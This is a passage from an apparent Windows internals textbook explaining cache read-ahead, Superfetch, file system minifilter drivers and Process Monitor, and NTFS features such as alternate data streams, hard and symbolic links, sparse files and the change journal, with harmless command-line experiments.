temporal locality and spatial locality. The underlying concept behind
temporal locality is that if a memory location is referenced, it is likely to be
referenced again soon. The idea behind spatial locality is that if a memory
location is referenced, other nearby locations are also likely to be referenced
soon. Thus, a cache typically is very good at speeding up access to memory
locations that have been accessed in the near past, but it’s terrible at speeding
up access to areas of memory that have not yet been accessed (it has zero
lookahead capability). In an attempt to populate the cache with data that will
likely be used soon, the cache manager implements two mechanisms: a read-
ahead thread and Superfetch.
As we described in the previous section, the cache manager includes a
thread that is responsible for attempting to read data from files before an
application, a driver, or a system thread explicitly requests it. The read-ahead
thread uses the history of read operations that were performed on a file,
which are stored in a file object’s private cache map, to determine how much
data to read. When the thread performs a read-ahead, it simply maps the
portion of the file it wants to read into the cache (allocating VACBs as
necessary) and touches the mapped data. The page faults caused by the
memory accesses invoke the page fault handler, which reads the pages into
the system’s working set.
A limitation of the read-ahead thread is that it works only on open files.
Superfetch was added to Windows to proactively add files to the cache
before they’re even opened. Specifically, the memory manager sends page-
usage information to the Superfetch service
(%SystemRoot%\System32\Sysmain.dll), and a file system minifilter
provides file name resolution data. The Superfetch service attempts to find
file-usage patterns—for example, payroll is run every Friday at 12:00, or
Outlook is run every morning at 8:00. When these patterns are derived, the
information is stored in a database and timers are requested. Just prior to the
time the file would most likely be used, a timer fires and tells the memory
manager to read the file into low-priority memory (using low-priority disk
I/O). If the file is then opened, the data is already in memory, and there’s no
need to wait for the data to be read from disk. If the file isn’t opened, the
low-priority memory will be reclaimed by the system. The internals and full
description of the Superfetch service were previously described in Chapter 5,
Part 1.
Memory manager’s page fault handler
We described how the page fault handler is used in the context of explicit file
I/O and cache manager read-ahead, but it’s also invoked whenever any
application accesses virtual memory that is a view of a mapped file and
encounters pages that represent portions of a file that aren’t yet in memory.
The memory manager’s MmAccessFault handler follows the same steps it
does when the cache manager generates a page fault from CcCopyRead or
CcCopyWrite, sending IRPs via IoPageRead to the file system on which the
file is stored.
File system filter drivers and minifilters
A filter driver that layers over a file system driver is called a file system filter
driver. Two types of file system filter drivers are supported by the Windows
I/O model:
■ Legacy file system filter drivers usually create one or multiple device
objects and attach them on the file system device through the
IoAttachDeviceToDeviceStack API. Legacy filter drivers intercept all
the requests coming from the cache manager or I/O manager and must
implement both standard IRP dispatch functions and the Fast I/O path.
Due to the complexity involved in the development of this kind of
driver (synchronization issues, undocumented interfaces, dependency
on the original file system, and so on), Microsoft has developed a
unified filter model that makes use of special drivers, called
minifilters, and deprecated legacy file system drivers. (The
IoAttachDeviceToDeviceStack API fails when it’s called for DAX
volumes).
■ Minifilters drivers are clients of the Filesystem Filter Manager
(Fltmgr.sys). The Filesystem Filter Manager is a legacy file system
filter driver that provides a rich and documented interface for the
creation of file system filters, hiding the complexity behind all the
interactions between the file system drivers and the cache manager.
Minifilters register with the filter manager through the
FltRegisterFilter API. The caller usually specifies an instance setup
routine and different operation callbacks. The instance setup is called
by the filter manager for every valid volume device that a file system
manages. The minifilter has the chance to decide whether to attach to
the volume. Minifilters can specify a Pre and Post operation callback
for every major IRP function code, as well as certain “pseudo-
operations” that describe internal memory manager or cache manager
semantics that are relevant to file system access patterns. The Pre
callback is executed before the I/O is processed by the file system
driver, whereas the Post callback is executed after the I/O operation
has been completed. The Filter Manager also provides its own
communication facility that can be employed between minifilter
drivers and their associated user-mode application.
The ability to see all file system requests and optionally modify or
complete them enables a range of applications, including remote file
replication services, file encryption, efficient backup, and licensing. Every
anti-malware product typically includes at least a minifilter driver that
intercepts applications opening or modifying files. For example, before
propagating the IRP to the file system driver to which the command is
directed, a malware scanner examines the file being opened to ensure that it’s
clean. If the file is clean, the malware scanner passes the IRP on, but if the
file is infected, the malware scanner quarantines or cleans the file. If the file
can’t be cleaned, the driver fails the IRP (typically with an access-denied
error) so that the malware cannot become active.
Deeply describing the entire minifilter and legacy filter driver architecture
is outside the scope of this chapter. You can find more information on the
legacy filter driver architecture in Chapter 6, “I/O System,” of Part 1. More
details on minifilters are available in MSDN (https://docs.microsoft.com/en-
us/windows-hardware/drivers/ifs/file-system-minifilter-drivers).
Data-scan sections
Starting with Windows 8.1, the Filter Manager collaborates with file system
drivers to provide data-scan section objects that can be used by anti-malware
products. Data-scan section objects are similar to standard section objects (for
more information about section objects, see Chapter 5 of Part 1) except for
the following:
■ Data-scan section objects can be created from minifilter callback
functions, namely from callbacks that manage the IRP_MJ_CREATE
function code. These callbacks are called by the filter manager when
an application is opening or creating a file. An anti-malware scanner
can create a data-scan section and then start scanning before
completing the callback.
■ FltCreateSectionForDataScan, the API used for creating data-scan
sections, accepts a FILE_OBJECT pointer. This means that callers
don’t need to provide a file handle. The file handle typically doesn’t
yet exist, and would thus need to be (re)created by using
FltCreateFile API, which would then have created other file creation
IRPs, recursively interacting with lower level file system filters once
again. With the new API, the process is much faster because these
extra recursive calls won’t be generated.
A data-scan section can be mapped like a normal section using the
traditional API. This allows anti-malware applications to implement their
scan engine either as a user-mode application or in a kernel-mode driver.
When the data-scan section is mapped, IRP_MJ_READ events are still
generated in the minifilter driver, but this is not a problem because the
minifilter doesn’t have to include a read callback at all.
Filtering named pipes and mailslots
When a process belonging to a user application needs to communicate with
another entity (a process, kernel driver, or remote application), it can leverage
facilities provided by the operating system. The most traditionally used are
named pipes and mailslots, because they are portable among other operating
systems as well. A named pipe is a named, one-way communication channel
between a pipe server and one or more pipe clients. All instances of a named
pipe share the same pipe name, but each instance has its own buffers and
handles, and provides a separate channel for client/server communication.
Named pipes are implemented through a file system driver, the NPFS driver
(Npfs.sys).
A mailslot is a multi-way communication channel between a mailslot
server and one or more clients. A mailslot server is a process that creates a
mailslot through the CreateMailslot Win32 API, and can only read small
messages (424 bytes maximum when sent between remote computers)
generated by one or more clients. Clients are processes that write messages to
the mailslot. Clients connect to the mailslot through the standard CreateFile
API and send messages through the WriteFile function. Mailslots are
generally used for broadcasting messages within a domain. If several server
processes in a domain each create a mailslot using the same name, every
message that is addressed to that mailslot and sent to the domain is received
by the participating processes. Mailslots are implemented through the
Mailslot file system driver, Msfs.sys.
Both the mailslot and NPFS driver implement simple file systems. They
manage namespaces composed of files and directories, which support
security, can be opened, closed, read, written, and so on. Describing the
implementation of the two drivers is outside the scope of this chapter.
Starting with Windows 8, mailslots and named pipes are supported by the
Filter Manager. Minifilters are able to attach to the mailslot and named pipe
volumes (\Device\NamedPipe and \Device\Mailslot, which are not real
volumes), through the FLTFL_REGISTRATION_SUPPORT_NPFS_MSFS
flag specified at registration time. A minifilter can then intercept and modify
all the named pipe and mailslot I/O that happens between local and remote
process and between a user application and its kernel driver. Furthermore,
minifilters can open or create a named pipe or mailslot without generating
recursive events through the FltCreateNamedPipeFile or
FltCreateMailslotFile APIs.
Note
One of the motivations that explains why the named pipe and mailslot file
system drivers are simpler compared to NTFS and ReFs is that they do
not interact heavily with the cache manager. The named pipe driver
implements the Fast I/O path but with no cached read or write-behind
support. The mailslot driver does not interact with the cache manager at
all.
Controlling reparse point behavior
The NTFS file system supports the concept of reparse points, blocks of 16
KB of application and system-defined reparse data that can be associated to
single files. (Reparse points are discussed more in multiple sections later in
this chapter.) Some types of reparse points, like volume mount points or
symbolic links, contain a link between the original file (or an empty
directory), used as a placeholder, and another file, which can even be located
in another volume. When the NTFS file system driver encounters a reparse
point on its path, it returns an error code to the upper driver in the device
stack. The latter (which could be another filter driver) analyzes the reparse
point content and, in the case of a symbolic link, re-emits another I/O to the
correct volume device.
This process is complex and cumbersome for any filter driver. Minifilters
drivers can intercept the STATUS_REPARSE error code and reopen the
reparse point through the new FltCreateFileEx2 API, which accepts a list of
Extra Create Parameters (also known as ECPs), used to fine-tune the
behavior of the opening/creation process of a target file in the minifilter
context. In general, the Filter Manager supports different ECPs, and each of
them is uniquely identified by a GUID. The Filter Manager provides multiple
documented APIs that deal with ECPs and ECP lists. Usually, minifilters
allocate an ECP with the FltAllocateExtraCreateParameter function,
populate it, and insert it into a list (through FltInsertExtraCreateParameter)
before calling the Filter Manager’s I/O APIs.
The FLT_CREATEFILE_TARGET extra creation parameter allows the
Filter Manager to manage cross-volume file creation automatically (the caller
needs to specify a flag). Minifilters don’t need to perform any other complex
operation.
With the goal of supporting container isolation, it’s also possible to set a
reparse point on nonempty directories and, in order to support container
isolation, create new files that have directory reparse points. The default
behavior that the file system has while encountering a nonempty directory
reparse point depends on whether the reparse point is applied in the last
component of the file full path. If this is the case, the file system returns the
STATUS_REPARSE error code, just like for an empty directory; otherwise, it
continues to walk the path.
The Filter Manager is able to correctly deal with this new kind of reparse
point through another ECP (named TYPE_OPEN_REPARSE). The ECP
includes a list of descriptors (OPEN_REPARSE_LIST_ ENTRY data
structure), each of which describes the type of reparse point (through its
Reparse Tag), and the behavior that the system should apply when it
encounters a reparse point of that type while parsing a path. Minifilters, after
they have correctly initialized the descriptor list, can apply the new behavior
in different ways:
■ Issue a new open (or create) operation on a file that resides in a path
that includes a reparse point in any of its components, using the
FltCreateFileEx2 function. This procedure is similar to the one used
by the FLT_CREATEFILE_TARGET ECP.
■ Apply the new reparse point behavior globally to any file that the Pre-
Create callback intercepts. The FltAddOpenReparseEntry and
FltRemoveOpenReparseEntry APIs can be used to set the reparse
point behavior to a target file before the file is actually created (the
pre-creation callback intercepts the file creation request before the file
is created). The Windows Container Isolation minifilter driver
(Wcifs.sys) uses this strategy.
Process Monitor
Process Monitor (Procmon), a system activity-monitoring utility from
Sysinternals that has been used throughout this book, is an example of a
passive minifilter driver, which is one that does not modify the flow of IRPs
between applications and file system drivers.
Process Monitor works by extracting a file system minifilter device driver
from its executable image (stored as a resource inside Procmon.exe) the first
time you run it after a boot, installing the driver in memory, and then deleting
the driver image from disk (unless configured for persistent boot-time
monitoring). Through the Process Monitor GUI, you can direct the driver to
monitor file system activity on local volumes that have assigned drive letters,
network shares, named pipes, and mail slots. When the driver receives a
command to start monitoring a volume, it registers filtering callbacks with
the Filter Manager, which is attached to the device object that represents a
mounted file system on the volume. After an attach operation, the I/O
manager redirects an IRP targeted at the underlying device object to the
driver owning the attached device, in this case the Filter Manager, which
sends the event to registered minifilter drivers, in this case Process Monitor.
When the Process Monitor driver intercepts an IRP, it records information
about the IRP’s command, including target file name and other parameters
specific to the command (such as read and write lengths and offsets) to a
nonpaged kernel buffer. Every 500 milliseconds, the Process Monitor GUI
program sends an IRP to Process Monitor’s interface device object, which
requests a copy of the buffer containing the latest activity, and then displays
the activity in its output window. Process Monitor shows all file activity as it
occurs, which makes it an ideal tool for troubleshooting file system–related
system and application failures. To run Process Monitor the first time on a
system, an account must have the Load Driver and Debug privileges. After
loading, the driver remains resident, so subsequent executions require only
the Debug privilege.
When you run Process Monitor, it starts in basic mode, which shows the
file system activity most often useful for troubleshooting. When in basic
mode, Process Monitor omits certain file system operations from being
displayed, including
■ I/O to NTFS metadata files
■ I/O to the paging file
■ I/O generated by the System process
■ I/O generated by the Process Monitor process
While in basic mode, Process Monitor also reports file I/O operations with
friendly names rather than with the IRP types used to represent them. For
example, both IRP_MJ_WRITE and FASTIO_WRITE operations display as
WriteFile, and IRP_MJ_CREATE operations show as Open if they represent
an open operation and as Create for the creation of new files.
EXPERIMENT: Viewing Process Monitor’s minifilter
driver
To see which file system minifilter drivers are loaded, start an
Administrative command prompt, and run the Filter Manager
control program (%SystemRoot%\System32\Fltmc.exe). Start
Process Monitor (ProcMon.exe) and run Fltmc again. You see that
the Process Monitor’s filter driver (PROCMON20) is loaded and
has a nonzero value in the Instances column. Now, exit Process
Monitor and run Fltmc again. This time, you see that the Process
Monitor’s filter driver is still loaded, but now its instance count is
zero.
The NT File System (NTFS)
In the following section, we analyze the internal architecture of the NTFS file
system, starting by looking at the requirements that drove its design. We
examine the on-disk data structures, and then we move on to the advanced
features provided by the NTFS file system, like the Recovery support, tiered
volumes, and the Encrypting File System (EFS).
High-end file system requirements
From the start, NTFS was designed to include features required of an
enterprise-class file system. To minimize data loss in the face of an
unexpected system outage or crash, a file system must ensure that the
integrity of its metadata is guaranteed at all times; and to protect sensitive
data from unauthorized access, a file system must have an integrated security
model. Finally, a file system must allow for software-based data redundancy
as a low-cost alternative to hardware-redundant solutions for protecting user
data. In this section, you find out how NTFS implements each of these
capabilities.
Recoverability
To address the requirement for reliable data storage and data access, NTFS
provides file system recovery based on the concept of an atomic transaction.
Atomic transactions are a technique for handling modifications to a database
so that system failures don’t affect the correctness or integrity of the
database. The basic tenet of atomic transactions is that some database
operations, called transactions, are all-or-nothing propositions. (A
transaction is defined as an I/O operation that alters file system data or
changes the volume’s directory structure.) The separate disk updates that
make up the transaction must be executed atomically—that is, once the
transaction begins to execute, all its disk updates must be completed. If a
system failure interrupts the transaction, the part that has been completed
must be undone, or rolled back. The rollback operation returns the database
to a previously known and consistent state, as if the transaction had never
occurred.
NTFS uses atomic transactions to implement its file system recovery
feature. If a program initiates an I/O operation that alters the structure of an
NTFS volume—that is, changes the directory structure, extends a file,
allocates space for a new file, and so on—NTFS treats that operation as an
atomic transaction. It guarantees that the transaction is either completed or, if
the system fails while executing the transaction, rolled back. The details of
how NTFS does this are explained in the section “NTFS recovery support”
later in the chapter. In addition, NTFS uses redundant storage for vital file
system information so that if a sector on the disk goes bad, NTFS can still
access the volume’s critical file system data.
Security
Security in NTFS is derived directly from the Windows object model. Files
and directories are protected from being accessed by unauthorized users. (For
more information on Windows security, see Chapter 7, “Security,” in Part 1.)
An open file is implemented as a file object with a security descriptor stored
on disk in the hidden $Secure metafile, in a stream named $SDS (Security
Descriptor Stream). Before a process can open a handle to any object,
including a file object, the Windows security system verifies that the process
has appropriate authorization to do so. The security descriptor, combined
with the requirement that a user log on to the system and provide an
identifying password, ensures that no process can access a file unless it is
given specific permission to do so by a system administrator or by the file’s
owner. (For more information about security descriptors, see the section
“Security descriptors and access control” in Chapter 7 in Part 1).
Data redundancy and fault tolerance
In addition to recoverability of file system data, some customers require that
their data not be endangered by a power outage or catastrophic disk failure.
The NTFS recovery capabilities ensure that the file system on a volume
remains accessible, but they make no guarantees for complete recovery of
user files. Protection for applications that can’t risk losing file data is
provided through data redundancy.
Data redundancy for user files is implemented via the Windows layered
driver, which provides fault-tolerant disk support. NTFS communicates with
a volume manager, which in turn communicates with a disk driver to write
data to a disk. A volume manager can mirror, or duplicate, data from one
disk onto another disk so that a redundant copy can always be retrieved. This
support is commonly called RAID level 1. Volume managers also allow data
to be written in stripes across three or more disks, using the equivalent of one
disk to maintain parity information. If the data on one disk is lost or becomes
inaccessible, the driver can reconstruct the disk’s contents by means of
exclusive-OR operations. This support is called RAID level 5.
In Windows 7, data redundancy for NTFS implemented via the Windows
layered driver was provided by Dynamic Disks. Dynamic Disks had multiple
limitations, which have been overcome in Windows 8.1 by introducing a new
technology that virtualizes the storage hardware, called Storage Spaces.
Storage Spaces is able to create virtual disks that already provide data
redundancy and fault tolerance. The volume manager doesn’t differentiate
between a virtual disk and a real disk (so user mode components can’t see
any difference between the two). The NTFS file system driver cooperates
with Storage Spaces for supporting tiered disks and RAID virtual
configurations. Storage Spaces and Spaces Direct will be covered later in this
chapter.
Advanced features of NTFS
In addition to NTFS being recoverable, secure, reliable, and efficient for
mission-critical systems, it includes the following advanced features that
allow it to support a broad range of applications. Some of these features are
exposed as APIs for applications to leverage, and others are internal features:
■ Multiple data streams
■ Unicode-based names
■ General indexing facility
■ Dynamic bad-cluster remapping
■ Hard links
■ Symbolic (soft) links and junctions
■ Compression and sparse files
■ Change logging
■ Per-user volume quotas
■ Link tracking
■ Encryption
■ POSIX support
■ Defragmentation
■ Read-only support and dynamic partitioning
■ Tiered volume support
The following sections provide an overview of these features.
Multiple data streams
In NTFS, each unit of information associated with a file—including its name,
its owner, its time stamps, its contents, and so on—is implemented as a file
attribute (NTFS object attribute). Each attribute consists of a single stream—
that is, a simple sequence of bytes. This generic implementation makes it
easy to add more attributes (and therefore more streams) to a file. Because a
file’s data is “just another attribute” of the file and because new attributes can
be added, NTFS files (and file directories) can contain multiple data streams.
An NTFS file has one default data stream, which has no name. An
application can create additional, named data streams and access them by
referring to their names. To avoid altering the Windows I/O APIs, which take
a string as a file name argument, the name of the data stream is specified by
appending a colon (:) to the file name. Because the colon is a reserved
character, it can serve as a separator between the file name and the data
stream name, as illustrated in this example:
myfile.dat:stream2
Each stream has a separate allocation size (which defines how much disk
space has been reserved for it), actual size (which is how many bytes the
caller has used), and valid data length (which is how much of the stream has
been initialized). In addition, each stream is given a separate file lock that is
used to lock byte ranges and to allow concurrent access.
One component in Windows that uses multiple data streams is the
Attachment Execution Service, which is invoked whenever the standard
Windows API for saving internet-based attachments is used by applications
such as Edge or Outlook. Depending on which zone the file was downloaded
from (such as the My Computer zone, the Intranet zone, or the Untrusted
zone), Windows Explorer might warn the user that the file came from a
possibly untrusted location or even completely block access to the file. For
example, Figure 11-24 shows the dialog box that’s displayed when executing
Process Explorer after it was downloaded from the Sysinternals site. This
type of data stream is called the $Zone.Identifier and is colloquially referred
to as the “Mark of the Web.”
Figure 11-24 Security warning for files downloaded from the internet.
Note
If you clear the check box for Always Ask Before Opening This File, the
zone identifier data stream will be removed from the file.
Other applications can use the multiple data stream feature as well. A
backup utility, for example, might use an extra data stream to store backup-
specific time stamps on files. Or an archival utility might implement
hierarchical storage in which files that are older than a certain date or that
haven’t been accessed for a specified period of time are moved to offline
storage. The utility could copy the file to offline storage, set the file’s default
data stream to 0, and add a data stream that specifies where the file is stored.
EXPERIMENT: Looking at streams
Most Windows applications aren’t designed to work with alternate
named streams, but both the echo and more commands are. Thus, a
simple way to view streams in action is to create a named stream
using echo and then display it using more. The following
command sequence creates a file named test with a stream named
stream:
Click here to view code image
c:\Test>echo Hello from a named stream! > test:stream
c:\Test>more < test:stream
Hello from a named stream!
c:\Test>
If you perform a directory listing, Test’s file size doesn’t reflect
the data stored in the alternate stream because NTFS returns the
size of only the unnamed data stream for file query operations,
including directory listings.
Click here to view code image
c:\Test>dir test
Volume in drive C is OS.
Volume Serial Number is F080-620F
Directory of c:\Test
12/07/2018 05:33 PM 0 test
1 File(s) 0 bytes
0 Dir(s) 18,083,577,856 bytes free
c:\Test>
You can determine what files and directories on your system
have alternate data streams with the Streams utility from
Sysinternals (see the following output) or by using the /r switch in
the dir command.
Click here to view code image
c:\Test>streams test
streams v1.60 - Reveal NTFS alternate streams.
Copyright (C) 2005-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
c:\Test\test:
:stream:$DATA 29
Unicode-based names
Like Windows as a whole, NTFS supports 16-bit Unicode 1.0/UTF-16
characters to store names of files, directories, and volumes. Unicode allows
each character in each of the world’s major languages to be uniquely
represented (Unicode can even represent emoji, or small drawings), which
aids in moving data easily from one country to another. Unicode is an
improvement over the traditional representation of international characters—
using a double-byte coding scheme that stores some characters in 8 bits and
others in 16 bits, a technique that requires loading various code pages to
establish the available characters. Because Unicode has a unique
representation for each character, it doesn’t depend on which code page is
loaded. Each directory and file name in a path can be as many as 255
characters long and can contain Unicode characters, embedded spaces, and
multiple periods.
General indexing facility
The NTFS architecture is structured to allow indexing of any file attribute on
a disk volume using a B-tree structure. (Creating indexes on arbitrary
attributes is not exported to users.) This structure enables the file system to
efficiently locate files that match certain criteria—for example, all the files in
a particular directory. In contrast, the FAT file system indexes file names but
doesn’t sort them, making lookups in large directories slow.
Several NTFS features take advantage of general indexing, including
consolidated security descriptors, in which the security descriptors of a
volume’s files and directories are stored in a single internal stream, have
duplicates removed, and are indexed using an internal security identifier that
NTFS defines. The use of indexing by these features is described in the
section “NTFS on-disk structure” later in this chapter.
Dynamic bad-cluster remapping
Ordinarily, if a program tries to read data from a bad disk sector, the read
operation fails and the data in the allocated cluster becomes inaccessible. If
the disk is formatted as a fault-tolerant NTFS volume, however, the Windows
volume manager—or Storage Spaces, depending on the component that
provides data redundancy—dynamically retrieves a good copy of the data
that was stored on the bad sector and then sends NTFS a warning that the
sector is bad. NTFS will then allocate a new cluster, replacing the cluster in
which the bad sector resides, and copies the data to the new cluster. It adds
the bad cluster to the list of bad clusters on that volume (stored in the hidden
metadata file $BadClus) and no longer uses it. This data recovery and
dynamic bad-cluster remapping is an especially useful feature for file servers
and fault-tolerant systems or for any application that can’t afford to lose data.
If the volume manager or Storage Spaces is not used when a sector goes bad
(such as early in the boot sequence), NTFS still replaces the cluster and
doesn’t reuse it, but it can’t recover the data that was on the bad sector.
Hard links
A hard link allows multiple paths to refer to the same file. (Hard links are not
supported on directories.) If you create a hard link named
C:\Documents\Spec.doc that refers to the existing file C:\Users
\Administrator\Documents\Spec.doc, the two paths link to the same on-disk
file, and you can make changes to the file using either path. Processes can
create hard links with the Windows CreateHardLink function.
NTFS implements hard links by keeping a reference count on the actual
data, where each time a hard link is created for the file, an additional file
name reference is made to the data. This means that if you have multiple hard
links for a file, you can delete the original file name that referenced the data
(C:\Users\Administrator\Documents\Spec.doc in our example), and the other
hard links (C:\Documents\Spec.doc) will remain and point to the data.
However, because hard links are on-disk local references to data (represented
by a file record number), they can exist only within the same volume and
can’t span volumes or computers.
EXPERIMENT: Creating a hard link
There are two ways you can create a hard link: the fsutil hardlink
create command or the mklink utility with the /H option. In this
experiment we’ll use mklink because we’ll use this utility later to
create a symbolic link as well. First, create a file called test.txt and
add some text to it, as shown here.
Click here to view code image
C:\>echo Hello from a Hard Link > test.txt
Now create a hard link called hard.txt as shown here:
Click here to view code image
C:\>mklink hard.txt test.txt /H
Hardlink created for hard.txt <<===>> test.txt
If you list the directory’s contents, you’ll notice that the two files
will be identical in every way, with the same creation date,
permissions, and file size; only the file names differ.
Click here to view code image
c:\>dir *.txt
Volume in drive C is OS
Volume Serial Number is F080-620F
Directory of c:\
12/07/2018 05:46 PM 26 hard.txt
12/07/2018 05:46 PM 26 test.txt
2 File(s) 52 bytes
0 Dir(s) 15,150,333,952 bytes free
Symbolic (soft) links and junctions
In addition to hard links, NTFS supports another type of file-name aliasing
called symbolic links or soft links. Unlike hard links, symbolic links are
strings that are interpreted dynamically and can be relative or absolute paths
that refer to locations on any storage device, including ones on a different
local volume or even a share on a different system. This means that symbolic
links don’t actually increase the reference count of the original file, so
deleting the original file will result in the loss of the data, and a symbolic link
that points to a nonexisting file will be left behind. Finally, unlike hard links,
symbolic links can point to directories, not just files, which gives them an
added advantage.
For example, if the path C:\Drivers is a directory symbolic link that
redirects to %SystemRoot%\System32\Drivers, an application reading
C:\Drivers\Ntfs.sys actually reads %SystemRoot%\System\Drivers\Ntfs.sys.
Directory symbolic links are a useful way to lift directories that are deep in a
directory tree to a more convenient depth without disturbing the original
tree’s structure or contents. The example just cited lifts the Drivers directory
to the volume’s root directory, reducing the directory depth of Ntfs.sys from
three levels to one when Ntfs.sys is accessed through the directory symbolic
link. File symbolic links work much the same way—you can think of them as
shortcuts, except they’re actually implemented on the file system instead of
being .lnk files managed by Windows Explorer. Just like hard links, symbolic
links can be created with the mklink utility (without the /H option) or through
the CreateSymbolicLink API.
Because certain legacy applications might not behave securely in the
presence of symbolic links, especially across different machines, the creation
of symbolic links requires the SeCreateSymbolicLink privilege, which is
typically granted only to administrators. Starting with Windows 10, and only
if Developer Mode is enabled, callers of CreateSymbolicLink API can
additionally specify the SYMBOLIC_LINK_FLAG_
ALLOW_UNPRIVILEGED_CREATE flag to overcome this limitation (this
allows a standard user is still able to create symbolic links from the command
prompt window). The file system also has a behavior option called
SymLinkEvaluation that can be configured with the following command:
Click here to view code image
fsutil behavior set SymLinkEvaluation
By default, the Windows default symbolic link evaluation policy allows
only local-to-local and local-to-remote symbolic links but not the opposite, as
shown here:
Click here to view code image
D:\>fsutil behavior query SymLinkEvaluation
Local to local symbolic links are enabled
Local to remote symbolic links are enabled.
Remote to local symbolic links are disabled.
Remote to Remote symbolic links are disabled.
Symbolic links are implemented using an NTFS mechanism called reparse
points. (Reparse points are discussed further in the section “Reparse points”
later in this chapter.) A reparse point is a file or directory that has a block of
data called reparse data associated with it. Reparse data is user-defined data
about the file or directory, such as its state or location that can be read from
the reparse point by the application that created the data, a file system filter
driver, or the I/O manager. When NTFS encounters a reparse point during a
file or directory lookup, it returns the STATUS_REPARSE status code, which
signals file system filter drivers that are attached to the volume and the I/O
manager to examine the reparse data. Each reparse point type has a unique
reparse tag. The reparse tag allows the component responsible for
interpreting the reparse point’s reparse data to recognize the reparse point
without having to check the reparse data. A reparse tag owner, either a file
system filter driver or the I/O manager, can choose one of the following
options when it recognizes reparse data:
■ The reparse tag owner can manipulate the path name specified in the
file I/O operation that crosses the reparse point and let the I/O
operation reissue with the altered path name. Junctions (described
shortly) take this approach to redirect a directory lookup, for example.
■ The reparse tag owner can remove the reparse point from the file,
alter the file in some way, and then reissue the file I/O operation.
There are no Windows functions for creating reparse points. Instead,
processes must use the FSCTL_SET_REPARSE_POINT file system control
code with the Windows DeviceIoControl function. A process can query a
reparse point’s contents with the FSCTL_GET_REPARSE_POINT file
system control code. The FILE_ATTRIBUTE_REPARSE_POINT flag is set
in a reparse point’s file attributes, so applications can check for reparse
points by using the Windows GetFileAttributes function.
Another type of reparse point that NTFS supports is the junction (also
known as Volume Mount point). Junctions are a legacy NTFS concept and
work almost identically to directory symbolic links, except they can only be
local to a volume. There is no advantage to using a junction instead of a
directory symbolic link, except that junctions are compatible with older
versions of Windows, while directory symbolic links are not.
As seen in the previous section, modern versions of Windows now allow
the creation of reparse points that can point to non-empty directories. The
system behavior (which can be controlled from minifilters drivers) depends
on the position of the reparse point in the target file’s full path. The filter
manager, NTFS, and ReFS file system drivers use the exposed
FsRtlIsNonEmptyDirectoryReparsePointAllowed API to detect if a reparse
point type is allowed on non-empty directories.
EXPERIMENT: Creating a symbolic link
This experiment shows you the main difference between a
symbolic link and a hard link, even when dealing with files on the
same volume. Create a symbolic link called soft.txt as shown here,
pointing to the test.txt file created in the previous experiment:
Click here to view code image
C:\>mklink soft.txt test.txt
symbolic link created for soft.txt <<===>> test.txt
If you list the directory’s contents, you’ll notice that the
symbolic link doesn’t have a file size and is identified by the
<SYMLINK> type. Furthermore, you’ll note that the creation time
is that of the symbolic link, not of the target file. The symbolic link
can also have security permissions that are different from the
permissions on the target file.
Click here to view code image
C:\>dir *.txt
Volume in drive C is OS
Volume Serial Number is 38D4-EA71
Directory of C:\
05/12/2012 11:55 PM 8 hard.txt
05/13/2012 12:28 AM <SYMLINK> soft.txt [test.txt]
05/12/2012 11:55 PM 8 test.txt
3 File(s) 16 bytes
0 Dir(s) 10,636,480,512 bytes free
Finally, if you delete the original test.txt file, you can verify that
both the hard link and symbolic link still exist but that the symbolic
link does not point to a valid file anymore, while the hard link
references the file data.
Compression and sparse files
NTFS supports compression of file data. Because NTFS performs
compression and decompression procedures transparently, applications don’t
have to be modified to take advantage of this feature. Directories can also be
compressed, which means that any files subsequently created in the directory
are compressed.
Applications compress and decompress files by passing DeviceIoControl
the FSCTL_SET_COMPRESSION file system control code. They query the
compression state of a file or directory with the
FSCTL_GET_COMPRESSION file system control code. A file or directory
that is compressed has the FILE_ATTRIBUTE_COMPRESSED flag set in its
attributes, so applications can also determine a file or directory’s
compression state with GetFileAttributes.
A second type of compression is known as sparse files. If a file is marked
as sparse, NTFS doesn’t allocate space on a volume for portions of the file
that an application designates as empty. NTFS returns 0-filled buffers when
an application reads from empty areas of a sparse file. This type of
compression can be useful for client/server applications that implement
circular-buffer logging, in which the server records information to a file, and
clients asynchronously read the information. Because the information that the
server writes isn’t needed after a client has read it, there’s no need to store
the information in the file. By making such a file sparse, the client can
specify the portions of the file it reads as empty, freeing up space on the
volume. The server can continue to append new information to the file
without fear that the file will grow to consume all available space on the
volume.
As with compressed files, NTFS manages sparse files transparently.
Applications specify a file’s sparseness state by passing the
FSCTL_SET_SPARSE file system control code to DeviceIoControl. To set a
range of a file to empty, applications use the FSCTL_SET_ZERO_DATA
code, and they can ask NTFS for a description of what parts of a file are
sparse by using the control code FSCTL_QUERY_ALLOCATED _RANGES.
One application of sparse files is the NTFS change journal, described next.
Change logging
Many types of applications need to monitor volumes for file and directory
changes. For example, an automatic backup program might perform an initial
full backup and then incremental backups based on file changes. An obvious
way for an application to monitor a volume for changes is for it to scan the
volume, recording the state of files and directories, and on a subsequent scan
detect differences. This process can adversely affect system performance,
however, especially on computers with thousands or tens of thousands of
files.
An alternate approach is for an application to register a directory
notification by using the FindFirstChangeNotification or
ReadDirectoryChangesW Windows function. As an input parameter, the
application specifies the name of a directory it wants to monitor, and the
function returns whenever the contents of the directory change. Although this
approach is more efficient than volume scanning, it requires the application
to be running at all times. Using these functions can also require an
application to scan directories because FindFirstChangeNotification doesn’t
indicate what changed—just that something in the directory has changed. An
application can pass a buffer to ReadDirectoryChangesW that the FSD fills
in with change records. If the buffer overflows, however, the application
must be prepared to fall back on scanning the directory.
NTFS provides a third approach that overcomes the drawbacks of the first
two: an application can configure the NTFS change journal facility by using
the DeviceIoControl function’s FSCTL_CREATE_USN_ JOURNAL file
system control code (USN is update sequence number) to have NTFS record
information about file and directory changes to an internal file called the
change journal. A change journal is usually large enough to virtually
guarantee that applications get a chance to process changes without missing
any. Applications use the FSCTL_QUERY_USN_JOURNAL file system
control code to read records from a change journal, and they can specify that
the DeviceIoControl function not complete until new records are available.
Per-user volume quotas
Systems administrators often need to track or limit user disk space usage on
shared storage volumes, so NTFS includes quota-management support. NTFS
quota-management support allows for per-user specification of quota
enforcement, which is useful for usage tracking and tracking when a user
reaches warning and limit thresholds. NTFS can be configured to log an
event indicating the occurrence to the System event log if a user surpasses his
warning limit. Similarly, if a user attempts to use more volume storage then
her quota limit permits, NTFS can log an event to the System event log and
fail the application file I/O that would have caused the quota violation with a
“disk full” error code.
NTFS tracks a user’s volume usage by relying on the fact that it tags files
and directories with the security ID (SID) of the user who created them. (See
Chapter 7, “Security,” in Part 1 for a definition of SIDs.) The logical sizes of
files and directories a user owns count against the user’s administrator-
